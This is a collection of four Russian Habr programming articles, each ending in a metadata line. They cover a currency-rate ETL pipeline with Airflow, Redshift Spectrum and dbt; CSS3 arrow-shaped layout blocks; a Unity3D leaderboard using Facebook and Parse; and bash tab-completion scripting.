Легаси приложение по выгрузке курсов валют формировало pivot-таблицу с коэффициентом для каждой пары в отдельном столбце. Это удобно, когда у нас есть строго фиксированный набор валют и наименования колонок, но превращается в головную боль если список валют необходимо расширить.
Появилось желание уйти от всех трансформаций и формирований таблиц в pandas до того как данные попадают в Хранилище. Здесь я придерживаюсь принципа применения всех трансформаций (**T** в EL**T**) в одном месте, и помогает мне в этом замечательный инструмент [dbt](https://habr.com/ru/company/wheely/blog/549614/).
### Интеграция с новым поставщиком данных
Как уже стало понятно, без внешнего поставщика данных обойтись не получится, поэтому предлагаю рассмотреть один из ряда провайдеров курсов валют – <https://openexchangerates.org/>
Минимальный необходимый план *Developer* включает в себя:
* 10.000 запросов ежемесячно (более чем достаточно)
* Ежечасные внутридневные обновления курсов
* Широкий набор базовых валют, включая криптовалюты
Доступные методы API:
Для получения актуальных курсов валют воспользуемся API endpoint [**/latest.json**](https://docs.openexchangerates.org/docs/latest-json)
Простой запрос-ответ может выглядеть следующим образом:
### Установка на расписание в Airflow
Для регулярного получения актуальных курсов валют я воспользуюсь инструментом Airflow. Apache Airflow – де-факто стандарт в области оркестрации данных, data engineering и управления пайплайнами.
Смысловая составляющая графа задачи (DAG):
* Сделать запрос к API
* Сохранить полученный ответ (например, в виде уникального ключа на S3)
* Уведомить в Slack в случае ошибки
Конфигурация DAG:
* Базовые валюты (base currency), от которых отсчитываем курсы
* Синхронизация расписание запусков с расчетом витрин в Хранилище Данных
* Токен доступа к сервису
Самый простой DAG состоит из одного таска с вызовом простого shell-скрипта:
```
TS=`date +"%Y-%m-%d-%H-%M-%S-%Z"`
curl -H "Authorization: Token $OXR_TOKEN" \
"https://openexchangerates.org/api/historical/$BUSINESS_DT.json?base=$BASE_CURRENCY&symbols=$SYMBOLS" \
| aws s3 cp - s3://$BUCKET/$BUCKET_PATH/$BUSINESS_DT-$BASE_CURRENCY-$TS.json
```
Вот как выглядит результат регулярной работы скрипта в S3:
Сегодня в штатном режиме выполняется около 25 обращений к сервису в сутки, статистика выглядит следующим образом:
### Выгрузка истории по новым валютам
После обеспечения регулярной выгрузки всех необходимых валют, можно приступить к формированию истории по новым базовым валютам (которой, очевидно, нет). Это позволит переводить в новые валюты суммы транзакций прошлых периодов.
К сожалению, план Developer не включает обращения к API endpoint [/time-series.json](https://docs.openexchangerates.org/docs/time-series-json), и только ради этой разовой задачи не имеет смысла делать upgrade на более дорогостоящую версию.
Воспользуемся методом [/historical/\*.json](https://docs.openexchangerates.org/docs/historical-json) и простым опросом API в цикле для формирования исторической выгрузки:
```
#!/bin/bash
d=2011-01-01
while [ "$d" != 2021-02-19 ]; do
echo $d
curl -H "Authorization: Token $TOKEN" "https://openexchangerates.org/api/historical/$d.json?base=AED&symbols=AED,GBP,EUR,RUB,USD" > ./export/$d.json
d=$(date -j -v +1d -f "%Y-%m-%d" $d +%Y-%m-%d)
done
```
Пиковая нагрузка вызвала вопросы у коллег, которые тоже пользуются сервисом, но это была разовая акция:
### Архивирование исторических курсов валют
Вся история обменных курсов полученная из legacy-источника ЦБ РФ до даты X (перехода на новый сервис-провайдер) подлежит архивированию в неизменном виде.
Я хочу сохранить все те курсы, которые мы показывали в своих аналитических инструментах без изменений. То есть чтобы суммы в дашбордах и отчетах бизнес-пользователей не были изменены ни на копейку.
Для этого я выполню выгрузку накопленных значений обменных курсов за весь исторический период в Data Lake. Более детально, я произведу:
* Трансформацию legacy pivot-таблицы в двумерную
* Запись в колоночный формат PARQUET в AWS S3
Формирование архива в S3 в формате PARQUET
```
CREATE EXTERNAL TABLE spectrum.currencies_cbrf
STORED AS PARQUET
LOCATION 's3:///dwh/currencies\_cbrf/' AS
WITH base AS (
SELECT 'EUR' AS base\_currency
UNION ALL
SELECT 'GBP'
UNION ALL
SELECT 'RUB'
UNION ALL
SELECT 'USD'
)
SELECT
"day" AS business\_dt
,b.base\_currency
,CASE b.base\_currency
WHEN 'EUR' THEN 1
WHEN 'GBP' THEN gbp\_to\_eur
WHEN 'RUB' THEN rub\_to\_eur
WHEN 'USD' THEN usd\_to\_eur
ELSE NULL
END AS eur
,CASE b.base\_currency
WHEN 'EUR' THEN eur\_to\_gbp
WHEN 'GBP' THEN 1
WHEN 'RUB' THEN rub\_to\_gbp
WHEN 'USD' THEN usd\_to\_gbp
ELSE NULL
END AS gbp
,CASE b.base\_currency
WHEN 'EUR' THEN eur\_to\_rub
WHEN 'GBP' THEN gbp\_to\_rub
WHEN 'RUB' THEN 1
WHEN 'USD' THEN usd\_to\_rub
ELSE NULL
END AS rub
,CASE b.base\_currency
WHEN 'EUR' THEN eur\_to\_usd
WHEN 'GBP' THEN gbp\_to\_usd
WHEN 'RUB' THEN rub\_to\_usd
WHEN 'USD' THEN 1
ELSE NULL
END AS usd
FROM ext.currencies c
CROSS JOIN base b
;
```
Таким образом, в хранилище S3 у меня теперь есть статический снимок всех обменных курсов, когда-либо использованных в аналитических приложениях, сериализованный в оптимизированный колоночный формат со сжатием. В случае необходимости пересчета витрин и исторических данных я запросто смогу воспользоваться этими курсами.
### Доступ к данным из DWH через S3 External Table
А теперь самое интересное – из своего аналитического движка Amazon Redshift я хочу иметь возможность просто и быстро обращаться к самым актуальным курсам валют, использовать их в своих трансформациях.
Оптимальное решение – создание внешних таблиц EXTERNAL TABLE, которые обеспечивают SQL-доступ к данным, хранящимся в S3. При этом нам доступно чтение полуструктурированных данных в формате JSON, бинарных данных в форматах AVRO, ORC, PARQUET и другие опции. Продукт имеет название [Redshift Spectrum](https://docs.aws.amazon.com/redshift/latest/dg/c-using-spectrum.html) и тесно связан с SQL-движком [Amazon Athena](https://docs.aws.amazon.com/athena/latest/ug/what-is.html), который имеет много общего с Presto.
```
CREATE EXTERNAL TABLE IF NOT EXISTS spectrum.currencies_oxr (
"timestamp" bigint
, base varchar(3)
, rates struct
)
ROW format serde 'org.openx.data.jsonserde.JsonSerDe'
LOCATION 's3:///dwh/currencies/'
;
```
Обратите внимание на обращение ко вложенному документу *rates* с помощью создания типа данных *struct*.
Теперь добавим к этой задаче секретную силу dbt. Модуль [dbt-external-tables](https://github.com/fishtown-analytics/dbt-external-tables) позволяет автоматизировать создание EXTERNAL TABLES и зарегистрировать их в качестве источников данных:
```
- name: external
schema: spectrum
tags: ["spectrum"]
loader: S3
description: "External data stored in S3 accessed vith Redshift Spectrum"
tables:
- name: currencies_oxr
description: "Currency Exchange Rates fetched from OXR API https://openexchangerates.org"
freshness:
error_after: {count: 15, period: hour}
loaded_at_field: timestamp 'epoch' + "timestamp" * interval '1 second'
external:
location: "s3:///dwh/currencies/"
row\_format: "serde 'org.openx.data.jsonserde.JsonSerDe'"
columns:
- name: timestamp
data\_type: bigint
- name: base
data\_type: varchar(3)
- name: rates
data\_type: struct
```
Немаловажным элементом является проверка своевременности данных – *source freshness test* на курсы валют. Тем самым мы будем постоянно держать руку на пульсе поступления актуальных данных в Хранилище. Очень важно рассчитывать все финансовые метрики корректно и в срок, а без актуальных значений курсов задачу решить невозможно.
В случае отставания данных – более 15 часов без свежих обменных курсов – мы тут же получаем уведомление в Slack.
Для прозрачности и простоты пользователей объединим исторические данные (архив) и постоянно поступающие актуальные курсы (новый API) в одну модель *currencies*:
Объединение исторических и новых данных в единый справочник
```
{{
config(
materialized='table',
dist='all',
sort=["business_dt", "base_currency"]
)
}}
with cbrf as (
select
business_dt
, null as business_ts
, base_currency
, aed
, eur
, gbp
, rub
, usd
from {{ source('external', 'currencies_cbrf') }}
where business_dt <= '2021-02-18'
),
oxr_all as (
select
(timestamp 'epoch' + o."timestamp" * interval '1 second')::date as business_dt
, (timestamp 'epoch' + o."timestamp" * interval '1 second') as business_ts
, o.base as base_currency
, o.rates.aed::decimal(10,4) as aed
, o.rates.eur::decimal(10,4) as eur
, o.rates.gbp::decimal(10,4) as gbp
, o.rates.rub::decimal(10,4) as rub
, o.rates.usd::decimal(10,4) as usd
, row_number() over (partition by base_currency, business_dt order by business_ts desc) as rn
from {{ source('external', 'currencies_oxr') }} as o
where business_dt > '2021-02-18'
),
oxr as (
select
business_dt
, business_ts
, base_currency
, aed
, eur
, gbp
, rub
, usd
from {{ ref('stg_currencies_oxr_all') }}
where rn = 1
),
united as (
select
business_dt
, business_ts
, base_currency
, aed
, eur
, gbp
, rub
, usd
from cbrf
union all
select
business_dt
, business_ts
, base_currency
, aed
, eur
, gbp
, rub
, usd
from oxr
)
select
business_dt
, business_ts
, base_currency
, aed
, eur
, gbp
, rub
, usd
from united
```
При этом физически справочник с курсами валют копируется на каждую ноду аналитического кластера Redshift и хранится в отсортированном по дате и базовой валюте виде для ускорения работы запросов.
### Использование курсов в моделировании данных
В целом, работа с курсами валют для аналитиков и инженеров, которые развивают Хранилище Данных не изменилась и осталась весьма простой. Все детали использования нового API, обращения к внешним полу-структурированным документам JSON в S3, объединению с архивными данными скрыты . В своих трансформациях достаточно сделать простой джоин на таблицу с курсами валют:
```
select
-- price_details
, r.currency
, {{ convert_currency('price', 'currency') }}
, {{ convert_currency('discount', 'currency') }}
, {{ convert_currency('insurance', 'currency') }}
, {{ convert_currency('tips', 'currency') }}
, {{ convert_currency('parking', 'currency') }}
, {{ convert_currency('toll_road', 'currency') }}
from {{ ref('requests') }} r
left join {{ ref('stg_currencies') }} currencies on r.completed_dt_utc = currencies.business_dt
and r.currency = currencies.base_currency
```
Сами метрики конвертируются при помощи простого макроса, который на вход принимает колонку с исходной суммой и колонку с исходным кодом валюты:
```
-- currency conversion macro
{% macro convert_currency(convert_column, currency_code_column) -%}
( {{ convert_column }} * aed )::decimal(18,4) as {{ convert_column }}_aed
, ( {{ convert_column }} * eur )::decimal(18,4) as {{ convert_column }}_eur
, ( {{ convert_column }} * gbp )::decimal(18,4) as {{ convert_column }}_gbp
, ( {{ convert_column }} * rub )::decimal(18,4) as {{ convert_column }}_rub
, ( {{ convert_column }} * usd )::decimal(18,4) as {{ convert_column }}_usd
{%- endmacro %}
```
### Практико-ориентированное развитие
Работа с данными – одно из наиболее востребованных и бурно развивающихся направлений. Каждый день я нахожу новые интересные задачи и придумываю решения для них. Это захватывающий и интересный путь, расширяющий горизонты.
В конце мая состоится юбилейный запуск курса [Data Engineer](https://otus.pw/wVRM/) в OTUS, в котором я принимаю участие в роли преподавателя.
По прошествии двух лет программа постоянно менялась, адаптировалась. Ближайший запуск принесет ряд нововведений и будет построен вокруг кейсов – реальных прикладных проблем инженеров:
* Data Architecture
* Data Lake
* Data Warehouse
* NoSQL / NewSQL
* MLOps
Детально с программой можно ознакомиться на [лендинге курса](https://otus.pw/wVRM/).
Также я делюсь своими авторскими заметками и планами в телеграм-канале [Technology Enthusiast](https://t.me/enthusiastech).
Благодарю за внимание. | https://habr.com/ru/post/558238/ | null | ru | null |
# Cтреловидные формы элементов с помощью CSS3

В веб-дизайне элементы неправильной формы всегда вызывают интерес. Стреловидные формы и диагональные линии могут создать интересный визуальный поток и дать приятный результат. Я был вдохновлен проектами, в которых используются неправильные формы, и теперь хочу показать пару простых примеров с их использованием.
Первый пример
-------------

В первом примере создадим обычный макет с одной особенностью: блоки будут разделяться не горизонтальной линией, а вертикальной. Для этого достаточно повернуть блок с контентом. Так как мы не хотим, чтобы контент поворачивался вместе с блоком, мы просто повернем его в обратную сторону.
### Разметка
Давайте создадим секцию для всего контента, а в нее поместим блоки с классом se-slope, внутри которых будет находиться тексты:
```
### Some headline
Some text
```
Теперь приступим к стилям.
### Стили
У веб-страницы будет такой же цвет фона, как и у блока с классом se-slope. Это позволит скрыть неровности краев повернутых блоков:
```
body{
background: #e90089;
}
```
Применим к блоку с классом se-container свойство overflow: hidden, чтобы отражались повернутые блоки:
```
.se-container{
display: block;
width: 100%;
overflow: hidden;
padding-top: 150px;
}
```
Сделаем нечетные блоки черными и повернем их на 5 градусов, а четные блоки сделаем розовыми и повернем их уже на -5 градусов. Скорректируем позиции нечетных элементов, добавив сверху отрицательный отступ:
```
.se-slope{
margin: 0 -50px;
transform-origin: left center;
}
.se-slope:nth-child(odd){
background: #000;
transform: rotate(5deg);
margin-top: -200px;
box-shadow: 0px -1px 3px rgba(0,0,0,0.4);
}
.se-slope:nth-child(even){
background: #e90089;
transform: rotate(-5deg);
box-shadow: 0px 2px 3px rgba(0,0,0,0.4) inset;
}
```
Отцентрируем контент:
```
.se-content{
margin: 0 auto;
}
```
Оформим заголовки. Для этого используем псевдо-элементы :before и :after для создания стреловидных сторон:
```
.se-content h3{
font-size: 60px;
position: relative;
display: inline-block;
padding: 10px 30px 8px 30px;
height: 80px;
line-height: 80px;
margin-bottom: 20px;
font-family: 'Bitter', 'Trebuchet MS', Arial;
text-shadow: 1px 1px 1px rgba(0,0,0,0.9);
}
.se-slope:nth-child(odd) .se-content h3{
background: #e90089;
color: #000;
}
.se-slope:nth-child(even) .se-content h3{
background: #000;
color: #e90089;
}
.se-content h3:before{
content: '';
width: 0;
height: 0;
border-top: 38px solid transparent;
border-bottom: 60px solid transparent;
border-right: 60px solid black;
position: absolute;
left: -59px;
top: 0px;
}
.se-content h3:after{
content: '';
width: 0;
height: 0;
border-top: 38px solid transparent;
border-bottom: 60px solid transparent;
border-left: 60px solid black;
position: absolute;
right: -59px;
top: 0px;
}
```
Зададим цвет для нечетных элементов:
```
.se-slope:nth-child(odd) .se-content h3:before,
.se-slope:nth-child(odd) .se-content h3:after{
border-right-color: #e90089;
border-left-color: #e90089;
}
```
Зададим стили для параграфов:
```
.se-content p{
width: 75%;
max-width: 500px;
margin: 0 auto;
font-style: italic;
font-size: 18px;
line-height: 24px;
padding-top: 10px;
}
```
Зададим стили для буквы, с которой начинается параграф:
```
.se-content p:first-letter{
font-size: 40px;
font-family: 'Adobe Garamond Pro', Georgia, serif;
}
```
Повернем контент таким образом, чтобы он располагался горизонтально и отрегулируем отступы:
```
.se-slope:nth-child(odd) .se-content{
transform: rotate(-5deg);
color: #e90089;
padding: 130px 100px 250px 100px;
}
.se-slope:nth-child(even) .se-content{
transform: rotate(5deg);
color: #000;
padding: 150px 100px 250px 100px;
}
```
[Демонстрация первого примера](http://salavat.me/examples/strelovidnye-formy/index.html)
Это был первый пример. Рассмотрим второй.
Второй пример
-------------

Во втором примере используем прозрачные границы и псевдо-элементы для создания стреловидных форм.
### Разметка
Используем такую же разметку, как и в первом примере, только добавим два класса sl-slope-black и sl-slope-pink в зависимости от цвета блоков:
```
### Some headline
Some text
```
Приступим к стилям.
### Стили
Веб-страница и блок с классом se-container будут иметь те же стили, что и в первом примере:
```
body{
background: #e90089
}
.se-container{
display: block;
width: 100%;
overflow: hidden;
box-shadow: 0px 0px 10px #000;
}
```
Блоки с контентом будут обтекаться слева и соединяться друг с другом:
```
.se-slope{
width: 50%;
height: 300px;
position: relative;
float: left;
overflow: hidden;
}
```
Добавим отступы к контенту:
```
.se-slope .se-content{
margin: 50px 100px 0px 100px;
}
```
Установим черный и розовый фон для соответствующих блоков:
```
.se-slope-black{
background: #000;
}
.se-slope-pink{
background: #e90089;
}
```
К черным блокам применим псевдо-элемент :after для создания стреловидной формы. Нечетные элементы будут располагаться слева, а четные — справа:
```
.se-slope-black:nth-child(odd):after,
.se-slope-black:nth-child(even):after{
content: '';
position: absolute;
bottom: 0px;
width: 0px;
height: 0px;
border-top: 150px solid transparent;
border-bottom: 150px solid transparent;
}
.se-slope-black:nth-child(odd):after{
border-right: 60px solid #e90089;
right: 0px;
}
.se-slope-black:nth-child(even):after{
border-left: 60px solid #e90089;
left: 0px;
}
```
Добавим стили к заголовкам:
```
.se-content h3{
z-index: 10;
font-size: 30px;
margin-top: 60px;
position: relative;
display: inline-block;
padding: 15px 20px;
line-height: 40px;
font-family: 'Bitter', 'Trebuchet MS', Arial;
text-shadow: 1px 1px 1px rgba(0,0,0,0.9);
}
.se-slope.se-slope-black h3{
background: #e90089;
}
.se-slope.se-slope-pink h3{
background: #000;
}
```
Добавим скосы у форм заголовков:
```
.se-slope.se-slope-black h3:after,
.se-slope.se-slope-black h3:before,
.se-slope.se-slope-pink h3:after,
.se-slope.se-slope-pink h3:before{
content: '';
width: 0px;
height: 0px;
top: 0px;
position: absolute;
}
.se-slope.se-slope-black h3:after{
border-top: 70px solid transparent;
border-left: 30px solid #e90089;
right: -30px;
}
.se-slope.se-slope-black h3:before{
border-bottom: 70px solid transparent;
border-right: 30px solid #e90089;
left: -30px;
}
.se-slope.se-slope-pink h3:after{
border-top: 70px solid transparent;
border-right: 30px solid #000;
left: -30px;
}
.se-slope.se-slope-pink h3:before{
border-bottom: 70px solid transparent;
border-left: 30px solid #000;
right: -30px;
}
```
Используем текст в качестве декоративного элемента. В левом блоке повернем текст на 15 градусов, а в правом повернем на -15 градусов:
```
.se-content p{
position: absolute;
z-index: 9;
opacity: 0.3;
font-size: 50px;
text-align: left;
transform-origin: top center;
}
.se-slope:nth-child(even) .se-content p{
transform: rotate(-15deg);
top: -100px;
right: -50px;
text-align: left;
width: 95%;
}
.se-slope:nth-child(odd) .se-content p{
transform: rotate(15deg);
top: -100px;
left: -50px;
text-align: right;
width: 90%;
}
.se-slope.sl-slope-pink .se-content p{
color: #000;
}
```
[Демонстрация второго примера](http://salavat.me/examples/strelovidnye-formy/index2.html)
Вот и все! Я надеюсь что вам понравился урок и вы найдете ему применение! | https://habr.com/ru/post/135508/ | null | ru | null |
# Простой лидерборд на Unity3D с facebook-ом
После участия в Ludum Dare 31 у нас появилась игра, в которой можно соревноваться с друзьями и мы решили добавить к ней лидерборд, с авторизацией через Facebook. Какие сложности могут возникнуть и как сделать подобный в своей игре читайте под катом.

#### Facebook
Первое что мы сделали — подключили Facebook SDK. Его можно скачать бесплатно с [Asset Store](https://www.assetstore.unity3d.com/en/#!/content/10989). Стоит отметить, что SDK написан достаточно давно и не слишком активно обновляется. В частности для совместимости с Unity 4.6 необходимо кое что поправить. Открываем файл *FB.cs* и там меняем в 411 строке **UNITY\_4\_5** на **UNITY\_4\_6**. Будет работать теперь. Ну или перепишите этот дефайн на правильный, чтобы работал и на 4.5, и на 4.6 и на всех последующих тоже.
Далее нужно создать и настроить приложение на <https://developers.facebook.com>. После этого вы получаете App ID, который вписываете в настройки через инспектор.

Далее необходимо инициализировать Facebook в Unity. Для этого необходимо вызвать функцию *FB.Init()*.В документации сказано, что ее нужно вызвать один и только один раз при первом запуске игры. И вот тут могут возникнуть первые сложности. Дело в том, что в нее нужно передать 2 колбека. На окончание инициализации и на сворачивание игры библиотекой. Возникает вопрос где эту функцию вызвать. Если у вас вся игра на одной сцене и эта сцена никогда не перезагружается, то проблем, нет. Просто вызываете в *Awake()* какого-нибудь GameController-а.
В противном случае лучше делать либо статические функции, либо сразу синглтон. Мы использовали вот [эту](http://wiki.unity3d.com/index.php/Singleton) его реализацию. Получилось достаточно просто.
```
public class SocialController : Singleton
{
public void Awake()
{
FB.Init(FacebookInited, OnHideUnity);
}
private void FacebookInited()
{
Debug.Log("FacebookInited");
if (FB.IsLoggedIn)
{
Debug.Log("Already logged in");
OnLoggedIn();
}
}
private void OnHideUnity(bool isGameShown)
{
Debug.Log("OnHideUnity");
if (!isGameShown)
{
GameController gameController = FindObjectOfType();
if (gameController != null)
{
gameController.SetPause();
}
}
}
...
}
```
После этого можно вызвать какую-нибудь функцию SocialController-а и он автоматически создастся. На любой сцене и не будет уничтожен при переходе по сценам. В функции *OnHideUnity()* можно поставить игру на паузу, если сейчас идет активный геймплей, а в *FacebookInited()* можно проверить не залогинен ли пользователь уже(такое бывает при перезапусках игры). Если же пользователь еще не логинился, то эту возможность ему нужно дать. Для этого мы добавили кнопку, которая показана в игре, если пользователь не залогинен(это можно проверить с *FB.IsLoggedIn*).
```
public void LoginToFaceBook()
{
if (!FB.IsLoggedIn)
{
FB.Login("user_friends", LoginCallback);
}
}
```
В функцию *FB.Login()* передаются необходимые игре разрешения. И вот тут возникает вопрос, а какие разрешения нам нужны? И зависит это от того, что мы хотим от фейсбука. Изначально мы хотели для лидерборда использовать [Facebook Scores API](https://developers.facebook.com/docs/games/scores?locale=ru_RU). Создано оно специально для лидербордов в играх, причем позиционируется как нечто очень простое. И по началу оно таким и показалось. Мы можем легко получить как свои очки, так и очки своих друзей, причем сразу же отсортированный список. Однако при дальнейшем изучении все оказалось не так просто. Во первых хранить там можно лишь 1 число для каждого пользователя. Так что лидерборд только 1 и только среди своих друзей.
Но хуже всего, что для обновления собственного Score приложение должно получить разрешение *publish\_actions*. А это разрешение подразумевает возможность и пользователю в ленту писать и много чего еще. А еще ваше приложение должно пройти ревью, чтобы иметь возможность просить это разрешение у пользователя. А пользователь может вам его еще и не дать. В итоге получается очень сложно, а возможности минимальны. Так что от такого решения пришлось отказаться.
Что же нам нужно в таком случае от фейсбука:
* Id пользователя
* Имя пользователя
* Список друзей — для реализации лидерборда друзей
Исходя из этого и формируем список разрешений в функции *FB.Login()*. Нам сейчас нужно только *user\_friends*.
Залогинившись, можно запросить необходимую нам информацию:
```
void OnLoggedIn()
{
Debug.Log("Logged in. ID: " + FB.UserId);
FB.API("/me?fields=name,friends", Facebook.HttpMethod.GET, FacebookCallback);
}
void FacebookCallback(FBResult result)
{
if (result.Error != null)
{
return;
}
string get_data = result.Text;
var dict = Json.Deserialize(get_data) as IDictionary;
_userName = dict["name"].ToString();
friends = Util.DeserializeJSONFriends(result.Text);
GotUser();
GetBestScoresFriends();
}
```
Функция *Util.DeserializeJSONFriends()* взята из официального примера и доступна вот [здесь](https://github.com/fbsamples/friendsmash-unity/blob/master/friendsmash_advanced/Assets/Scripts/Util.cs). В итоге в переменной *\_userName* у нас будет имя игрока, а в *friends* — список его друзей.
#### Parse
Следующий шаг — сохранение очков и списка игроков. Так как от Facebook Score API мы отказались, то нам потребуется сервер. Самый простой способ его получить — использовать [Parse](https://www.parse.com/). У него есть библиотека специально для Unity и доступна [здесь](https://www.parse.com/docs/downloads). Впрочем, библиотека явно создавалась не специально для Unity, а была взята просто .NET версия, что еще вызовет определенные трудности.
Настройка Parse больших сложностей не вызывает, благо официальный [гайд](https://www.parse.com/apps/quickstart#parse_data/unity) написан достаточно хорошо. Отмечу лишь, что *Parse Initialize Behaviour* стоит добавлять именно к новому объекту, а не к геймконтроллеру, так как с ним объект не будет уничтожаться при перезагрузке сцены.
Parse предоставляет разработчикам большие возможности, но что же может понадобиться нам? Первое что мы думали использовать — это *ParseUser* — пользователь в терминологии Parse. Его можно создать нового или обновлять существующего. Нужны они для того чтобы унифицировать пользователей разных типов и связывать разные профили одного пользователя. Скажем, если пользователь сначала логинился к вам через email, а потом решил указать еще и аккаунт Facebook. Тогда вы можете добавить информацию о FB аккаунте игрока в его профиль. Однако, повозившись немного с *ParseUser* мы поняли, что они нам не особо то и нужны, так что дальше мы их оспользовать не будем.
А вот что нам точно понадобится, так это ParseObject. Каждый такой объект по сути — это запись в таблице данных. В какой таблице задается названием при создании объекта. Соответственно пишите *new ParseObject(«DataTable»)* — получите новую запись в таблице DataTable после того как вызовите метод *Save()*. Получается простой алгоритм для лидерборда. Ищем в таблице запись с текущим пользователем, если не нашли создаем новую. В любом случае у нас будет ParseObject с текущим пользователем. Записываем в него имя игрока, его рекорд и сохраняем.
```
private void GotUser()
{
var query = ParseObject.GetQuery("GameScore")
.WhereEqualTo("playerFacebookID", FB.UserId);
query.FindAsync().ContinueWith(t =>
{
IEnumerable result = t.Result;
if (!result.Any())
{
Debug.Log("UserScoreParseObject not found. Create one!");
\_userScoreParseObject = new ParseObject("GameScore");
\_userScoreParseObject["score"] = 0;
if (string.IsNullOrEmpty(\_userName))
\_userScoreParseObject["playerName"] = "Player";
else
\_userScoreParseObject["playerName"] = \_userName;
\_userScoreParseObject["playerFacebookID"] = FB.UserId;
\_userScoreParseObject.SaveAsync();
}
else
{
Debug.Log("Found score on Parse!");
\_userScoreParseObject = result.ElementAt(0);
int score = \_userScoreParseObject.Get("score");
if (score > GameController.BestScore)
{
GameController.BestScore = score;
GameController.UpdateBestScore = true;
}
}
});
}
public void SaveScore(int score)
{
if (\_userScoreParseObject == null)
return;
Debug.Log("Save new score on Parse! " + score);
int oldScore = \_userScoreParseObject.Get("score");
if (score > oldScore)
{
\_userScoreParseObject["score"] = score;
\_userScoreParseObject.SaveAsync();
}
}
```
*GameController.BestScore* и *GameController.UpdateBestScore* — статические поля класса *GameController*. Как я уже говорил, Parse изначально не проектировался для Unity, поэтому и логика его работы несколько неудобна. Вместо привычных для Unity программистов корутин здесь используется системный класс Task. Работает он асинхронно и содержимое *ContinueWith()* у вас будет вызвано в другом потоке. При попытке вызвать какой-то метод *MonoBehaviour* — получите ошибку. Статические поля — не самый красивый способ обойти эту проблему, но в нашем случае это помогло. Если кто-то из хабра-пользователей расскажет в комментариях нормальный способ вернуться в главный поток приложения(может быть наподобие [Looper](http://developer.android.com/reference/android/os/Looper.html)-а из андроид-программирования) — буду благодарен.
Осталось лишь получить список лучших игроков среди всех и среди друзей. Для этого достаточно лишь составить правильный запрос к Parse.
```
public void GetBestScoresOverall()
{
var query = ParseObject.GetQuery("GameScore")
.OrderByDescending("score")
.Limit(5);
query.FindAsync().ContinueWith(t =>
{
IEnumerable result = t.Result;
string leaderboardString = "";
foreach (ParseObject parseObject in result)
{
leaderboardString += parseObject.Get("playerName");
leaderboardString += " - ";
leaderboardString += parseObject.Get("score").ToString();
leaderboardString += "\n";
}
GameController.overallLeaderboardString = leaderboardString;
});
}
public void GetBestScoresFriends()
{
if (friends != null && friends.Any())
{
List friendIds = new List();
foreach (Dictionary friend in friends)
{
friendIds.Add((string)friend["id"]);
}
if (friendIds.Any())
{
string regexp = FB.UserId;
for (int i = 0; i < friendIds.Count; i++)
{
regexp += "|";
regexp += friendIds[i];
}
var queryFriends = ParseObject.GetQuery("GameScore")
.OrderByDescending("score")
.WhereMatches("playerFacebookID", regexp, "")
.Limit(5);
queryFriends.FindAsync().ContinueWith(t =>
{
IEnumerable result = t.Result;
string leaderboardString = "";
foreach (ParseObject parseObject in result)
{
leaderboardString += parseObject.Get("playerName");
leaderboardString += " - ";
leaderboardString += parseObject.Get("score").ToString();
leaderboardString += "\n";
}
GameController.friendsLeaderboardString = leaderboardString;
});
}
}
}
```
Если с функцией получения глобального лидерборда все более-менее понятно, то вот написание функции выбора друзей может быть не тривиально. В данном случае мы составляем регулярное выражение, которое выбирает из таблицы нас и наших друзей. Мало того, что функция *WhereMatches()* по документации может работать медленно, так еще и регулярное выражение может получиться достаточно длинным(зависит от количества друзей, тоже играющих в эту игру). Думаю, этот способ не подойдет для сколько-нибудь крупных проектов, но для небольшой игры пока работает замечательно и проблем не вызывало. Впрочем, буду благодарен, если кто то опишет как в этом случае надо поступать «по уму».
#### Бонус
После всего этого мы получили рабочий лидерборд с авторизацией через Facebook. А раз уж у нас уже есть авторизация, то почему бы не сделать возможность поделиться результатом с друзьями. Самое классное, что если не делать это автоматически, а предлагать пользователю стандартный диалог, то вам не потребуются специальные разрешения.
```
public void ShareResults()
{
string socialText = string.Format("I scored {0} in Sentinel. Can you beat it?", GameController.BestScore);
FB.Feed(
link: "https://apps.facebook.com/306586236197672",
linkName: "Sentinel",
linkCaption: "Sentinel @ LudumDare#31",
linkDescription: socialText,
picture: "https://www.dropbox.com/s/nmo2z079w90vnf0/icon.png?dl=1",
callback: LogCallback
);
}
```
Спасибо, что дочитали до конца. Делайте хорошие игры и подталкивайте игроков к соревнованию с лидербордами.
Кому интересно как это в итоге работает — [итоговый результат](https://apps.facebook.com/306586236197672). А вот [здесь](http://ludumdare.com/compo/ludum-dare-31/?action=preview&uid=46923) можно поиграть в изначальную версию. | https://habr.com/ru/post/245985/ | null | ru | null |
# Использование bash completion в командной строке, собственных скриптах и приложениях. Часть 2
Про bash completion на хабре я уже писал [тут](http://habrahabr.ru/blogs/sysadm/71525/), и даже конце пообещал рассказать про настройку автодополнения для собственных скриптов.
Однако, прошло уже полтора года, а лично у меня до продолжения руки так и не дошли. Зато эту почетную обязанность взял на себя хабраюзер [infthi](https://habrahabr.ru/users/infthi/), опубликую от его имени.
Рассматривать я буду модельную задачу, близкую к той, на которой я постигал азы автодополнений. Суть такова:

Есть скрипт, у которого есть три подкоманды. Одна из этих команд — work — в примере не рассматривается, у оставшихся есть следующие подкоманды. history делает import или export, каждой из этих команд надо передать имя проекта и пару значений под флагами. help может рассказать про work, history и help.
Теперь о том, как, собственно, работает автодополнение. Для баша пишется функция, которой передаются уже введенные аргументы, и на основе их она генерирует возможные варианты дополнения. Эта функция (назовём её \_my\_command) регистрируется для конкретной команды (в данном случае — мы исполняем скрипт названный script, поэтому регистрация идет для script) волшебной командой complete:
`complete -F _my_command script`
Теперь самое интересное — написание этой функции, обрабатывающей аргументы, и выдающей список доступных параметров.
Для начала, из man bash можно узнать о существовании специальных переменных для работы с автодополнением. Мы будем использовать следующие:
COMPREPLY
Это массив, из которого bash получает возможные дополнения.
COMP\_WORDS
Это массив, содержащий уже введённые аргументы. Анализируя их, мы можем понять, какие варианты дополнения надо предлагать.
COMP\_CWORD
Это — индекс в предыдущем массиве, который показывает позицию в нем аргумента, редактируемого в данный момент.
Теперь попробуем на основе этих переменных проанализировать ввод, и если вводится первый аргумент — попробовать его дополнить
```
_my_command(){ #объявляем функцию, которую будем привязывать к анализу
COMPREPLY=() #пока что мы не знаем, что предложить пользователю, поэтому создадим пустой список.
cur="${COMP_WORDS[COMP_CWORD]}" #получаем текущий вводимый аргумент
subcommands_1="work history help" #массив подкоманд первого уровня - см. синтаксическое дерево в начале поста.
if [[ ${COMP_CWORD} == 1 ]] ; then #если вводится первый аргумент, то попробуем его дополнить
COMPREPLY=( $(compgen -W "${subcommands_1}" -- ${cur}) ) #some magic
return 0 #COMPREPLY заполнен, можно выходить
fi
}
```
